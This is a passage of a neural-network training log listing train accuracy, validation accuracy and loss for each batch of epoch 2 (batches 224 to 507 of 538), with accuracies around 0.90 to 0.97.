Validation Accuracy: 0.926, Loss: 0.936\nEpoch 2 Batch 225/538 - Train Accuracy: 0.928, Validation Accuracy: 0.922, Loss: 0.927\nEpoch 2 Batch 226/538 - Train Accuracy: 0.927, Validation Accuracy: 0.926, Loss: 0.934\nEpoch 2 Batch 227/538 - Train Accuracy: 0.937, Validation Accuracy: 0.931, Loss: 0.895\nEpoch 2 Batch 228/538 - Train Accuracy: 0.936, Validation Accuracy: 0.928, Loss: 0.895\nEpoch 2 Batch 229/538 - Train Accuracy: 0.938, Validation Accuracy: 0.931, Loss: 0.908\nEpoch 2 Batch 230/538 - Train Accuracy: 0.925, Validation Accuracy: 0.925, Loss: 0.917\nEpoch 2 Batch 231/538 - Train Accuracy: 0.912, Validation Accuracy: 0.928, Loss: 0.932\nEpoch 2 Batch 232/538 - Train Accuracy: 0.921, Validation Accuracy: 0.930, Loss: 0.980\nEpoch 2 Batch 233/538 - Train Accuracy: 0.943, Validation Accuracy: 0.928, Loss: 0.959\nEpoch 2 Batch 234/538 - Train Accuracy: 0.933, Validation Accuracy: 0.930, Loss: 0.942\nEpoch 2 Batch 235/538 - Train Accuracy: 0.935, Validation Accuracy: 0.929, Loss: 0.923\nEpoch 2 Batch 236/538 - Train Accuracy: 0.927, Validation Accuracy: 0.932, Loss: 0.887\nEpoch 2 Batch 237/538 - Train Accuracy: 0.927, Validation Accuracy: 0.935, Loss: 0.969\nEpoch 2 Batch 238/538 - Train Accuracy: 0.945, Validation Accuracy: 0.926, Loss: 0.919\nEpoch 2 Batch 239/538 - Train Accuracy: 0.918, Validation Accuracy: 0.926, Loss: 0.958\nEpoch 2 Batch 240/538 - Train Accuracy: 0.920, Validation Accuracy: 0.923, Loss: 0.919\nEpoch 2 Batch 241/538 - Train Accuracy: 0.936, Validation Accuracy: 0.922, Loss: 0.905\nEpoch 2 Batch 242/538 - Train Accuracy: 0.940, Validation Accuracy: 0.922, Loss: 0.939\nEpoch 2 Batch 243/538 - Train Accuracy: 0.945, Validation Accuracy: 0.928, Loss: 0.967\nEpoch 2 Batch 244/538 - Train Accuracy: 0.927, Validation Accuracy: 0.925, Loss: 0.931\nEpoch 2 Batch 245/538 - Train Accuracy: 0.949, Validation Accuracy: 0.926, Loss: 0.929\nEpoch 2 Batch 246/538 - Train Accuracy: 0.944, Validation Accuracy: 0.921, Loss: 0.901\nEpoch 2 Batch 247/538 - Train Accuracy: 0.922, Validation Accuracy: 0.917, Loss: 0.873\nEpoch 2 Batch 248/538 - Train Accuracy: 0.937, Validation Accuracy: 0.919, Loss: 0.949\nEpoch 2 Batch 249/538 - Train Accuracy: 0.932, Validation Accuracy: 0.921, Loss: 0.945\nEpoch 2 Batch 250/538 - Train Accuracy: 0.929, Validation Accuracy: 0.920, Loss: 0.902\nEpoch 2 Batch 251/538 - Train Accuracy: 0.939, Validation Accuracy: 0.922, Loss: 0.937\nEpoch 2 Batch 252/538 - Train Accuracy: 0.935, Validation Accuracy: 0.932, Loss: 0.925\nEpoch 2 Batch 253/538 - Train Accuracy: 0.909, Validation Accuracy: 0.923, Loss: 0.927\nEpoch 2 Batch 254/538 - Train Accuracy: 0.902, Validation Accuracy: 0.926, Loss: 0.916\nEpoch 2 Batch 255/538 - Train Accuracy: 0.941, Validation Accuracy: 0.927, Loss: 0.922\nEpoch 2 Batch 256/538 - Train Accuracy: 0.926, Validation Accuracy: 0.925, Loss: 0.964\nEpoch 2 Batch 257/538 - Train Accuracy: 0.926, Validation Accuracy: 0.931, Loss: 0.895\nEpoch 2 Batch 258/538 - Train Accuracy: 0.947, Validation Accuracy: 0.928, Loss: 0.913\nEpoch 2 Batch 259/538 - Train Accuracy: 0.948, Validation Accuracy: 0.924, Loss: 0.913\nEpoch 2 Batch 260/538 - Train Accuracy: 0.918, Validation Accuracy: 0.917, Loss: 0.914\nEpoch 2 Batch 261/538 - Train Accuracy: 0.936, Validation Accuracy: 0.915, Loss: 0.918\nEpoch 2 Batch 262/538 - Train Accuracy: 0.942, Validation Accuracy: 0.917, Loss: 0.926\nEpoch 2 Batch 263/538 - Train Accuracy: 0.910, Validation Accuracy: 0.914, Loss: 0.946\nEpoch 2 Batch 264/538 - Train Accuracy: 0.924, Validation Accuracy: 0.904, Loss: 0.899\nEpoch 2 Batch 265/538 - Train Accuracy: 0.920, Validation Accuracy: 0.906, Loss: 0.925\nEpoch 2 Batch 266/538 - Train Accuracy: 0.917, Validation Accuracy: 0.901, Loss: 0.918\nEpoch 2 Batch 267/538 - Train Accuracy: 0.932, Validation Accuracy: 0.904, Loss: 0.917\nEpoch 2 Batch 268/538 - Train Accuracy: 0.951, Validation Accuracy: 0.904, Loss: 0.948\nEpoch 2 Batch 269/538 - Train Accuracy: 0.936, Validation Accuracy: 0.899, Loss: 0.914\nEpoch 2 Batch 270/538 - Train Accuracy: 0.940, Validation Accuracy: 0.900, Loss: 0.897\nEpoch 2 Batch 271/538 - Train Accuracy: 0.910, Validation Accuracy: 0.903, Loss: 0.899\nEpoch 2 Batch 272/538 - Train Accuracy: 0.919, Validation Accuracy: 0.907, Loss: 0.891\nEpoch 2 Batch 273/538 - Train Accuracy: 0.920, Validation Accuracy: 0.913, Loss: 0.920\nEpoch 2 Batch 274/538 - Train Accuracy: 0.886, Validation Accuracy: 0.910, Loss: 0.929\nEpoch 2 Batch 275/538 - Train Accuracy: 0.920, Validation Accuracy: 0.913, Loss: 0.939\nEpoch 2 Batch 276/538 - Train Accuracy: 0.929, Validation Accuracy: 0.921, Loss: 0.909\nEpoch 2 Batch 277/538 - Train Accuracy: 0.939, Validation Accuracy: 0.922, Loss: 0.916\nEpoch 2 Batch 278/538 - Train Accuracy: 0.921, Validation Accuracy: 0.928, Loss: 0.913\nEpoch 2 Batch 279/538 - Train Accuracy: 0.939, Validation Accuracy: 0.930, Loss: 0.934\nEpoch 2 Batch 280/538 - Train Accuracy: 0.929, Validation Accuracy: 0.928, Loss: 0.887\nEpoch 2 Batch 281/538 - Train Accuracy: 0.909, Validation Accuracy: 0.928, Loss: 0.937\nEpoch 2 Batch 282/538 - Train Accuracy: 0.926, Validation Accuracy: 0.929, Loss: 0.860\nEpoch 2 Batch 283/538 - Train Accuracy: 0.946, Validation Accuracy: 0.926, Loss: 0.887\nEpoch 2 Batch 284/538 - Train Accuracy: 0.926, Validation Accuracy: 0.928, Loss: 0.938\nEpoch 2 Batch 285/538 - Train Accuracy: 0.931, Validation Accuracy: 0.933, Loss: 0.873\nEpoch 2 Batch 286/538 - Train Accuracy: 0.908, Validation Accuracy: 0.926, Loss: 0.950\nEpoch 2 Batch 287/538 - Train Accuracy: 0.942, Validation Accuracy: 0.929, Loss: 0.863\nEpoch 2 Batch 288/538 - Train Accuracy: 0.945, Validation Accuracy: 0.927, Loss: 0.906\nEpoch 2 Batch 289/538 - Train Accuracy: 0.940, Validation Accuracy: 0.928, Loss: 0.894\nEpoch 2 Batch 290/538 - Train Accuracy: 0.936, Validation Accuracy: 0.925, Loss: 0.929\nEpoch 2 Batch 291/538 - Train Accuracy: 0.938, Validation Accuracy: 0.921, Loss: 0.952\nEpoch 2 Batch 292/538 - Train Accuracy: 0.940, Validation Accuracy: 0.926, Loss: 0.902\nEpoch 2 Batch 293/538 - Train Accuracy: 0.936, Validation Accuracy: 0.930, Loss: 0.947\nEpoch 2 Batch 294/538 - Train Accuracy: 0.912, Validation Accuracy: 0.928, Loss: 0.881\nEpoch 2 Batch 295/538 - Train Accuracy: 0.943, Validation Accuracy: 0.927, Loss: 0.890\nEpoch 2 Batch 296/538 - Train Accuracy: 0.920, Validation Accuracy: 0.923, Loss: 0.892\nEpoch 2 Batch 297/538 - Train Accuracy: 0.954, Validation Accuracy: 0.926, Loss: 0.887\nEpoch 2 Batch 298/538 - Train Accuracy: 0.904, Validation Accuracy: 0.923, Loss: 0.912\nEpoch 2 Batch 299/538 - Train Accuracy: 0.924, Validation Accuracy: 0.925, Loss: 0.865\nEpoch 2 Batch 300/538 - Train Accuracy: 0.930, Validation Accuracy: 0.928, Loss: 0.899\nEpoch 2 Batch 301/538 - Train Accuracy: 0.937, Validation Accuracy: 0.935, Loss: 0.908\nEpoch 2 Batch 302/538 - Train Accuracy: 0.937, Validation Accuracy: 0.933, Loss: 0.901\nEpoch 2 Batch 303/538 - Train Accuracy: 0.939, Validation Accuracy: 0.925, Loss: 0.927\nEpoch 2 Batch 304/538 - Train Accuracy: 0.923, Validation Accuracy: 0.933, Loss: 0.924\nEpoch 2 Batch 305/538 - Train Accuracy: 0.936, Validation Accuracy: 0.930, Loss: 0.972\nEpoch 2 Batch 306/538 - Train Accuracy: 0.924, Validation Accuracy: 0.931, Loss: 0.934\nEpoch 2 Batch 307/538 - Train Accuracy: 0.946, Validation Accuracy: 0.943, Loss: 0.947\nEpoch 2 Batch 308/538 - Train Accuracy: 0.945, Validation Accuracy: 0.947, Loss: 0.944\nEpoch 2 Batch 309/538 - Train Accuracy: 0.936, Validation Accuracy: 0.953, Loss: 0.929\nEpoch 2 Batch 310/538 - Train Accuracy: 0.953, Validation Accuracy: 0.950, Loss: 0.937\nEpoch 2 Batch 311/538 - Train Accuracy: 0.921, Validation Accuracy: 0.946, Loss: 0.899\nEpoch 2 Batch 312/538 - Train Accuracy: 0.937, Validation Accuracy: 0.935, Loss: 0.884\nEpoch 2 Batch 313/538 - Train Accuracy: 0.936, Validation Accuracy: 0.934, Loss: 0.871\nEpoch 2 Batch 314/538 - Train Accuracy: 0.935, Validation Accuracy: 0.942, Loss: 0.917\nEpoch 2 Batch 315/538 - Train Accuracy: 0.932, Validation Accuracy: 0.941, Loss: 0.925\nEpoch 2 Batch 316/538 - Train Accuracy: 0.929, Validation Accuracy: 0.940, Loss: 0.879\nEpoch 2 Batch 317/538 - Train Accuracy: 0.925, Validation Accuracy: 0.936, Loss: 0.926\nEpoch 2 Batch 318/538 - Train Accuracy: 0.916, Validation Accuracy: 0.939, Loss: 0.934\nEpoch 2 Batch 319/538 - Train Accuracy: 0.939, Validation Accuracy: 0.939, Loss: 0.904\nEpoch 2 Batch 320/538 - Train Accuracy: 0.917, Validation Accuracy: 0.936, Loss: 0.902\nEpoch 2 Batch 321/538 - Train Accuracy: 0.929, Validation Accuracy: 0.936, Loss: 0.874\nEpoch 2 Batch 322/538 - Train Accuracy: 0.939, Validation Accuracy: 0.927, Loss: 0.953\nEpoch 2 Batch 323/538 - Train Accuracy: 0.943, Validation Accuracy: 0.922, Loss: 0.915\nEpoch 2 Batch 324/538 - Train Accuracy: 0.940, Validation Accuracy: 0.926, Loss: 0.924\nEpoch 2 Batch 325/538 - Train Accuracy: 0.941, Validation Accuracy: 0.924, Loss: 0.946\nEpoch 2 Batch 326/538 - Train Accuracy: 0.958, Validation Accuracy: 0.921, Loss: 0.948\nEpoch 2 Batch 327/538 - Train Accuracy: 0.928, Validation Accuracy: 0.924, Loss: 0.927\nEpoch 2 Batch 328/538 - Train Accuracy: 0.953, Validation Accuracy: 0.920, Loss: 0.922\nEpoch 2 Batch 329/538 - Train Accuracy: 0.948, Validation Accuracy: 0.919, Loss: 0.893\nEpoch 2 Batch 330/538 - Train Accuracy: 0.952, Validation Accuracy: 0.918, Loss: 0.907\nEpoch 2 Batch 331/538 - Train Accuracy: 0.945, Validation Accuracy: 0.919, Loss: 0.889\nEpoch 2 Batch 332/538 - Train Accuracy: 0.941, Validation Accuracy: 0.925, Loss: 0.911\nEpoch 2 Batch 333/538 - Train Accuracy: 0.939, Validation Accuracy: 0.918, Loss: 0.955\nEpoch 2 Batch 334/538 - Train Accuracy: 0.941, Validation Accuracy: 0.922, Loss: 0.923\nEpoch 2 Batch 335/538 - Train Accuracy: 0.938, Validation Accuracy: 0.926, Loss: 0.876\nEpoch 2 Batch 336/538 - Train Accuracy: 0.935, Validation Accuracy: 0.931, Loss: 0.970\nEpoch 2 Batch 337/538 - Train Accuracy: 0.925, Validation Accuracy: 0.934, Loss: 0.916\nEpoch 2 Batch 338/538 - Train Accuracy: 0.937, Validation Accuracy: 0.938, Loss: 0.912\nEpoch 2 Batch 339/538 - Train Accuracy: 0.930, Validation Accuracy: 0.936, Loss: 0.919\nEpoch 2 Batch 340/538 - Train Accuracy: 0.934, Validation Accuracy: 0.934, Loss: 0.874\nEpoch 2 Batch 341/538 - Train Accuracy: 0.943, Validation Accuracy: 0.930, Loss: 0.945\nEpoch 2 Batch 342/538 - Train Accuracy: 0.923, Validation Accuracy: 0.931, Loss: 0.943\nEpoch 2 Batch 343/538 - Train Accuracy: 0.929, Validation Accuracy: 0.930, Loss: 0.877\nEpoch 2 Batch 344/538 - Train Accuracy: 0.952, Validation Accuracy: 0.936, Loss: 0.896\nEpoch 2 Batch 345/538 - Train Accuracy: 0.947, Validation Accuracy: 0.931, Loss: 0.931\nEpoch 2 Batch 346/538 - Train Accuracy: 0.911, Validation Accuracy: 0.919, Loss: 0.924\nEpoch 2 Batch 347/538 - Train Accuracy: 0.950, Validation Accuracy: 0.918, Loss: 0.851\nEpoch 2 Batch 348/538 - Train Accuracy: 0.922, Validation Accuracy: 0.919, Loss: 0.884\nEpoch 2 Batch 349/538 - Train Accuracy: 0.954, Validation Accuracy: 0.921, Loss: 0.923\nEpoch 2 Batch 350/538 - Train Accuracy: 0.922, Validation Accuracy: 0.925, Loss: 0.963\nEpoch 2 Batch 351/538 - Train Accuracy: 0.932, Validation Accuracy: 0.925, Loss: 0.938\nEpoch 2 Batch 352/538 - Train Accuracy: 0.913, Validation Accuracy: 0.925, Loss: 0.893\nEpoch 2 Batch 353/538 - Train Accuracy: 0.923, Validation Accuracy: 0.923, Loss: 0.918\nEpoch 2 Batch 354/538 - Train Accuracy: 0.932, Validation Accuracy: 0.927, Loss: 0.898\nEpoch 2 Batch 355/538 - Train Accuracy: 0.942, Validation Accuracy: 0.930, Loss: 0.892\nEpoch 2 Batch 356/538 - Train Accuracy: 0.947, Validation Accuracy: 0.928, Loss: 0.952\nEpoch 2 Batch 357/538 - Train Accuracy: 0.922, Validation Accuracy: 0.933, Loss: 0.893\nEpoch 2 Batch 358/538 - Train Accuracy: 0.949, Validation Accuracy: 0.938, Loss: 0.928\nEpoch 2 Batch 359/538 - Train Accuracy: 0.930, Validation Accuracy: 0.937, Loss: 0.920\nEpoch 2 Batch 360/538 - Train Accuracy: 0.929, Validation Accuracy: 0.936, Loss: 0.908\nEpoch 2 Batch 361/538 - Train Accuracy: 0.948, Validation Accuracy: 0.940, Loss: 0.904\nEpoch 2 Batch 362/538 - Train Accuracy: 0.952, Validation Accuracy: 0.939, Loss: 0.920\nEpoch 2 Batch 363/538 - Train Accuracy: 0.952, Validation Accuracy: 0.937, Loss: 0.869\nEpoch 2 Batch 364/538 - Train Accuracy: 0.923, Validation Accuracy: 0.933, Loss: 0.896\nEpoch 2 Batch 365/538 - Train Accuracy: 0.937, Validation Accuracy: 0.931, Loss: 0.918\nEpoch 2 Batch 366/538 - Train Accuracy: 0.946, Validation Accuracy: 0.931, Loss: 0.895\nEpoch 2 Batch 367/538 - Train Accuracy: 0.943, Validation Accuracy: 0.934, Loss: 0.895\nEpoch 2 Batch 368/538 - Train Accuracy: 0.938, Validation Accuracy: 0.941, Loss: 0.895\nEpoch 2 Batch 369/538 - Train Accuracy: 0.941, Validation Accuracy: 0.936, Loss: 0.944\nEpoch 2 Batch 370/538 - Train Accuracy: 0.947, Validation Accuracy: 0.933, Loss: 0.926\nEpoch 2 Batch 371/538 - Train Accuracy: 0.947, Validation Accuracy: 0.933, Loss: 0.944\nEpoch 2 Batch 372/538 - Train Accuracy: 0.938, Validation Accuracy: 0.929, Loss: 0.929\nEpoch 2 Batch 373/538 - Train Accuracy: 0.921, Validation Accuracy: 0.925, Loss: 0.908\nEpoch 2 Batch 374/538 - Train Accuracy: 0.933, Validation Accuracy: 0.923, Loss: 0.896\nEpoch 2 Batch 375/538 - Train Accuracy: 0.934, Validation Accuracy: 0.920, Loss: 0.934\nEpoch 2 Batch 376/538 - Train Accuracy: 0.934, Validation Accuracy: 0.923, Loss: 0.933\nEpoch 2 Batch 377/538 - Train Accuracy: 0.950, Validation Accuracy: 0.926, Loss: 0.848\nEpoch 2 Batch 378/538 - Train Accuracy: 0.935, Validation Accuracy: 0.930, Loss: 0.920\nEpoch 2 Batch 379/538 - Train Accuracy: 0.939, Validation Accuracy: 0.935, Loss: 0.868\nEpoch 2 Batch 380/538 - Train Accuracy: 0.933, Validation Accuracy: 0.937, Loss: 0.937\nEpoch 2 Batch 381/538 - Train Accuracy: 0.948, Validation Accuracy: 0.941, Loss: 0.914\nEpoch 2 Batch 382/538 - Train Accuracy: 0.922, Validation Accuracy: 0.945, Loss: 0.918\nEpoch 2 Batch 383/538 - Train Accuracy: 0.945, Validation Accuracy: 0.949, Loss: 0.909\nEpoch 2 Batch 384/538 - Train Accuracy: 0.933, Validation Accuracy: 0.942, Loss: 0.914\nEpoch 2 Batch 385/538 - Train Accuracy: 0.951, Validation Accuracy: 0.946, Loss: 0.895\nEpoch 2 Batch 386/538 - Train Accuracy: 0.942, Validation Accuracy: 0.942, Loss: 0.919\nEpoch 2 Batch 387/538 - Train Accuracy: 0.938, Validation Accuracy: 0.944, Loss: 0.929\nEpoch 2 Batch 388/538 - Train Accuracy: 0.940, Validation Accuracy: 0.942, Loss: 0.977\nEpoch 2 Batch 389/538 - Train Accuracy: 0.920, Validation Accuracy: 0.936, Loss: 0.905\nEpoch 2 Batch 390/538 - Train Accuracy: 0.937, Validation Accuracy: 0.934, Loss: 0.900\nEpoch 2 Batch 391/538 - Train Accuracy: 0.936, Validation Accuracy: 0.933, Loss: 0.885\nEpoch 2 Batch 392/538 - Train Accuracy: 0.924, Validation Accuracy: 0.937, Loss: 0.916\nEpoch 2 Batch 393/538 - Train Accuracy: 0.949, Validation Accuracy: 0.938, Loss: 0.900\nEpoch 2 Batch 394/538 - Train Accuracy: 0.915, Validation Accuracy: 0.938, Loss: 0.946\nEpoch 2 Batch 395/538 - Train Accuracy: 0.948, Validation Accuracy: 0.933, Loss: 0.916\nEpoch 2 Batch 396/538 - Train Accuracy: 0.922, Validation Accuracy: 0.930, Loss: 0.903\nEpoch 2 Batch 397/538 - Train Accuracy: 0.946, Validation Accuracy: 0.931, Loss: 0.924\nEpoch 2 Batch 398/538 - Train Accuracy: 0.931, Validation Accuracy: 0.934, Loss: 0.889\nEpoch 2 Batch 399/538 - Train Accuracy: 0.931, Validation Accuracy: 0.932, Loss: 0.888\nEpoch 2 Batch 400/538 - Train Accuracy: 0.941, Validation Accuracy: 0.937, Loss: 0.871\nEpoch 2 Batch 401/538 - Train Accuracy: 0.960, Validation Accuracy: 0.938, Loss: 0.933\nEpoch 2 Batch 402/538 - Train Accuracy: 0.929, Validation Accuracy: 0.932, Loss: 0.885\nEpoch 2 Batch 403/538 - Train Accuracy: 0.935, Validation Accuracy: 0.935, Loss: 0.933\nEpoch 2 Batch 404/538 - Train Accuracy: 0.942, Validation Accuracy: 0.931, Loss: 0.889\nEpoch 2 Batch 405/538 - Train Accuracy: 0.941, Validation Accuracy: 0.924, Loss: 0.950\nEpoch 2 Batch 406/538 - Train Accuracy: 0.921, Validation Accuracy: 0.923, Loss: 0.913\nEpoch 2 Batch 407/538 - Train Accuracy: 0.952, Validation Accuracy: 0.917, Loss: 0.933\nEpoch 2 Batch 408/538 - Train Accuracy: 0.926, Validation Accuracy: 0.919, Loss: 0.902\nEpoch 2 Batch 409/538 - Train Accuracy: 0.929, Validation Accuracy: 0.929, Loss: 0.920\nEpoch 2 Batch 410/538 - Train Accuracy: 0.954, Validation Accuracy: 0.930, Loss: 0.950\nEpoch 2 Batch 411/538 - Train Accuracy: 0.934, Validation Accuracy: 0.933, Loss: 0.931\nEpoch 2 Batch 412/538 - Train Accuracy: 0.936, Validation Accuracy: 0.931, Loss: 0.937\nEpoch 2 Batch 413/538 - Train Accuracy: 0.923, Validation Accuracy: 0.935, Loss: 0.921\nEpoch 2 Batch 414/538 - Train Accuracy: 0.908, Validation Accuracy: 0.929, Loss: 0.955\nEpoch 2 Batch 415/538 - Train Accuracy: 0.922, Validation Accuracy: 0.931, Loss: 0.913\nEpoch 2 Batch 416/538 - Train Accuracy: 0.942, Validation Accuracy: 0.929, Loss: 0.897\nEpoch 2 Batch 417/538 - Train Accuracy: 0.947, Validation Accuracy: 0.927, Loss: 0.908\nEpoch 2 Batch 418/538 - Train Accuracy: 0.933, Validation Accuracy: 0.933, Loss: 0.851\nEpoch 2 Batch 419/538 - Train Accuracy: 0.939, Validation Accuracy: 0.927, Loss: 0.876\nEpoch 2 Batch 420/538 - Train Accuracy: 0.947, Validation Accuracy: 0.922, Loss: 0.901\nEpoch 2 Batch 421/538 - Train Accuracy: 0.933, Validation Accuracy: 0.931, Loss: 0.903\nEpoch 2 Batch 422/538 - Train Accuracy: 0.918, Validation Accuracy: 0.923, Loss: 0.891\nEpoch 2 Batch 423/538 - Train Accuracy: 0.946, Validation Accuracy: 0.923, Loss: 0.923\nEpoch 2 Batch 424/538 - Train Accuracy: 0.928, Validation Accuracy: 0.921, Loss: 0.913\nEpoch 2 Batch 425/538 - Train Accuracy: 0.943, Validation Accuracy: 0.923, Loss: 0.910\nEpoch 2 Batch 426/538 - Train Accuracy: 0.936, Validation Accuracy: 0.922, Loss: 0.886\nEpoch 2 Batch 427/538 - Train Accuracy: 0.922, Validation Accuracy: 0.925, Loss: 0.887\nEpoch 2 Batch 428/538 - Train Accuracy: 0.951, Validation Accuracy: 0.928, Loss: 0.925\nEpoch 2 Batch 429/538 - Train Accuracy: 0.939, Validation Accuracy: 0.931, Loss: 0.934\nEpoch 2 Batch 430/538 - Train Accuracy: 0.930, Validation Accuracy: 0.934, Loss: 0.930\nEpoch 2 Batch 431/538 - Train Accuracy: 0.932, Validation Accuracy: 0.932, Loss: 0.914\nEpoch 2 Batch 432/538 - Train Accuracy: 0.924, Validation Accuracy: 0.930, Loss: 0.908\nEpoch 2 Batch 433/538 - Train Accuracy: 0.930, Validation Accuracy: 0.923, Loss: 0.958\nEpoch 2 Batch 434/538 - Train Accuracy: 0.936, Validation Accuracy: 0.927, Loss: 0.970\nEpoch 2 Batch 435/538 - Train Accuracy: 0.932, Validation Accuracy: 0.919, Loss: 0.930\nEpoch 2 Batch 436/538 - Train Accuracy: 0.927, Validation Accuracy: 0.918, Loss: 0.907\nEpoch 2 Batch 437/538 - Train Accuracy: 0.935, Validation Accuracy: 0.920, Loss: 0.923\nEpoch 2 Batch 438/538 - Train Accuracy: 0.944, Validation Accuracy: 0.923, Loss: 0.899\nEpoch 2 Batch 439/538 - Train Accuracy: 0.948, Validation Accuracy: 0.929, Loss: 0.931\nEpoch 2 Batch 440/538 - Train Accuracy: 0.941, Validation Accuracy: 0.920, Loss: 0.947\nEpoch 2 Batch 441/538 - Train Accuracy: 0.928, Validation Accuracy: 0.926, Loss: 0.934\nEpoch 2 Batch 442/538 - Train Accuracy: 0.938, Validation Accuracy: 0.921, Loss: 0.903\nEpoch 2 Batch 443/538 - Train Accuracy: 0.931, Validation Accuracy: 0.921, Loss: 0.904\nEpoch 2 Batch 444/538 - Train Accuracy: 0.948, Validation Accuracy: 0.918, Loss: 0.895\nEpoch 2 Batch 445/538 - Train Accuracy: 0.956, Validation Accuracy: 0.917, Loss: 0.867\nEpoch 2 Batch 446/538 - Train Accuracy: 0.943, Validation Accuracy: 0.917, Loss: 0.914\nEpoch 2 Batch 447/538 - Train Accuracy: 0.935, Validation Accuracy: 0.919, Loss: 0.937\nEpoch 2 Batch 448/538 - Train Accuracy: 0.938, Validation Accuracy: 0.922, Loss: 0.921\nEpoch 2 Batch 449/538 - Train Accuracy: 0.943, Validation Accuracy: 0.919, Loss: 0.902\nEpoch 2 Batch 450/538 - Train Accuracy: 0.921, Validation Accuracy: 0.924, Loss: 0.930\nEpoch 2 Batch 451/538 - Train Accuracy: 0.925, Validation Accuracy: 0.925, Loss: 0.874\nEpoch 2 Batch 452/538 - Train Accuracy: 0.937, Validation Accuracy: 0.928, Loss: 0.895\nEpoch 2 Batch 453/538 - Train Accuracy: 0.942, Validation Accuracy: 0.929, Loss: 0.942\nEpoch 2 Batch 454/538 - Train Accuracy: 0.928, Validation Accuracy: 0.927, Loss: 0.920\nEpoch 2 Batch 455/538 - Train Accuracy: 0.933, Validation Accuracy: 0.930, Loss: 0.918\nEpoch 2 Batch 456/538 - Train Accuracy: 0.929, Validation Accuracy: 0.936, Loss: 0.922\nEpoch 2 Batch 457/538 - Train Accuracy: 0.933, Validation Accuracy: 0.934, Loss: 0.875\nEpoch 2 Batch 458/538 - Train Accuracy: 0.943, Validation Accuracy: 0.931, Loss: 0.918\nEpoch 2 Batch 459/538 - Train Accuracy: 0.942, Validation Accuracy: 0.930, Loss: 0.907\nEpoch 2 Batch 460/538 - Train Accuracy: 0.912, Validation Accuracy: 0.923, Loss: 0.941\nEpoch 2 Batch 461/538 - Train Accuracy: 0.951, Validation Accuracy: 0.919, Loss: 0.904\nEpoch 2 Batch 462/538 - Train Accuracy: 0.940, Validation Accuracy: 0.921, Loss: 0.897\nEpoch 2 Batch 463/538 - Train Accuracy: 0.910, Validation Accuracy: 0.931, Loss: 0.972\nEpoch 2 Batch 464/538 - Train Accuracy: 0.942, Validation Accuracy: 0.927, Loss: 0.897\nEpoch 2 Batch 465/538 - Train Accuracy: 0.942, Validation Accuracy: 0.919, Loss: 0.912\nEpoch 2 Batch 466/538 - Train Accuracy: 0.937, Validation Accuracy: 0.917, Loss: 0.863\nEpoch 2 Batch 467/538 - Train Accuracy: 0.931, Validation Accuracy: 0.916, Loss: 0.877\nEpoch 2 Batch 468/538 - Train Accuracy: 0.944, Validation Accuracy: 0.925, Loss: 0.938\nEpoch 2 Batch 469/538 - Train Accuracy: 0.954, Validation Accuracy: 0.924, Loss: 0.944\nEpoch 2 Batch 470/538 - Train Accuracy: 0.939, Validation Accuracy: 0.928, Loss: 0.896\nEpoch 2 Batch 471/538 - Train Accuracy: 0.941, Validation Accuracy: 0.933, Loss: 0.925\nEpoch 2 Batch 472/538 - Train Accuracy: 0.974, Validation Accuracy: 0.942, Loss: 0.877\nEpoch 2 Batch 473/538 - Train Accuracy: 0.917, Validation Accuracy: 0.939, Loss: 0.917\nEpoch 2 Batch 474/538 - Train Accuracy: 0.951, Validation Accuracy: 0.940, Loss: 0.903\nEpoch 2 Batch 475/538 - Train Accuracy: 0.953, Validation Accuracy: 0.947, Loss: 0.889\nEpoch 2 Batch 476/538 - Train Accuracy: 0.936, Validation Accuracy: 0.945, Loss: 0.887\nEpoch 2 Batch 477/538 - Train Accuracy: 0.948, Validation Accuracy: 0.942, Loss: 0.925\nEpoch 2 Batch 478/538 - Train Accuracy: 0.956, Validation Accuracy: 0.939, Loss: 0.897\nEpoch 2 Batch 479/538 - Train Accuracy: 0.951, Validation Accuracy: 0.933, Loss: 0.910\nEpoch 2 Batch 480/538 - Train Accuracy: 0.949, Validation Accuracy: 0.932, Loss: 0.935\nEpoch 2 Batch 481/538 - Train Accuracy: 0.940, Validation Accuracy: 0.933, Loss: 0.918\nEpoch 2 Batch 482/538 - Train Accuracy: 0.948, Validation Accuracy: 0.938, Loss: 0.909\nEpoch 2 Batch 483/538 - Train Accuracy: 0.925, Validation Accuracy: 0.941, Loss: 0.923\nEpoch 2 Batch 484/538 - Train Accuracy: 0.943, Validation Accuracy: 0.942, Loss: 0.938\nEpoch 2 Batch 485/538 - Train Accuracy: 0.946, Validation Accuracy: 0.939, Loss: 0.913\nEpoch 2 Batch 486/538 - Train Accuracy: 0.953, Validation Accuracy: 0.945, Loss: 0.911\nEpoch 2 Batch 487/538 - Train Accuracy: 0.944, Validation Accuracy: 0.946, Loss: 0.904\nEpoch 2 Batch 488/538 - Train Accuracy: 0.950, Validation Accuracy: 0.947, Loss: 0.875\nEpoch 2 Batch 489/538 - Train Accuracy: 0.929, Validation Accuracy: 0.947, Loss: 0.917\nEpoch 2 Batch 490/538 - Train Accuracy: 0.941, Validation Accuracy: 0.942, Loss: 0.916\nEpoch 2 Batch 491/538 - Train Accuracy: 0.921, Validation Accuracy: 0.943, Loss: 0.895\nEpoch 2 Batch 492/538 - Train Accuracy: 0.935, Validation Accuracy: 0.940, Loss: 0.883\nEpoch 2 Batch 493/538 - Train Accuracy: 0.915, Validation Accuracy: 0.946, Loss: 0.905\nEpoch 2 Batch 494/538 - Train Accuracy: 0.960, Validation Accuracy: 0.940, Loss: 0.952\nEpoch 2 Batch 495/538 - Train Accuracy: 0.939, Validation Accuracy: 0.936, Loss: 0.942\nEpoch 2 Batch 496/538 - Train Accuracy: 0.954, Validation Accuracy: 0.937, Loss: 0.937\nEpoch 2 Batch 497/538 - Train Accuracy: 0.949, Validation Accuracy: 0.939, Loss: 0.888\nEpoch 2 Batch 498/538 - Train Accuracy: 0.940, Validation Accuracy: 0.938, Loss: 0.937\nEpoch 2 Batch 499/538 - Train Accuracy: 0.939, Validation Accuracy: 0.931, Loss: 0.912\nEpoch 2 Batch 500/538 - Train Accuracy: 0.958, Validation Accuracy: 0.928, Loss: 0.880\nEpoch 2 Batch 501/538 - Train Accuracy: 0.955, Validation Accuracy: 0.925, Loss: 0.890\nEpoch 2 Batch 502/538 - Train Accuracy: 0.936, Validation Accuracy: 0.920, Loss: 0.919\nEpoch 2 Batch 503/538 - Train Accuracy: 0.958, Validation Accuracy: 0.925, Loss: 0.885\nEpoch 2 Batch 504/538 - Train Accuracy: 0.952, Validation Accuracy: 0.923, Loss: 0.900\nEpoch 2 Batch 505/538 - Train Accuracy: 0.956, Validation Accuracy: 0.919, Loss: 0.879\nEpoch 2 Batch 506/538 - Train Accuracy: 0.955, Validation Accuracy: 0.915, Loss: 0.864\nEpoch 2 Batch 507/538 - Train Accuracy: 0.918, 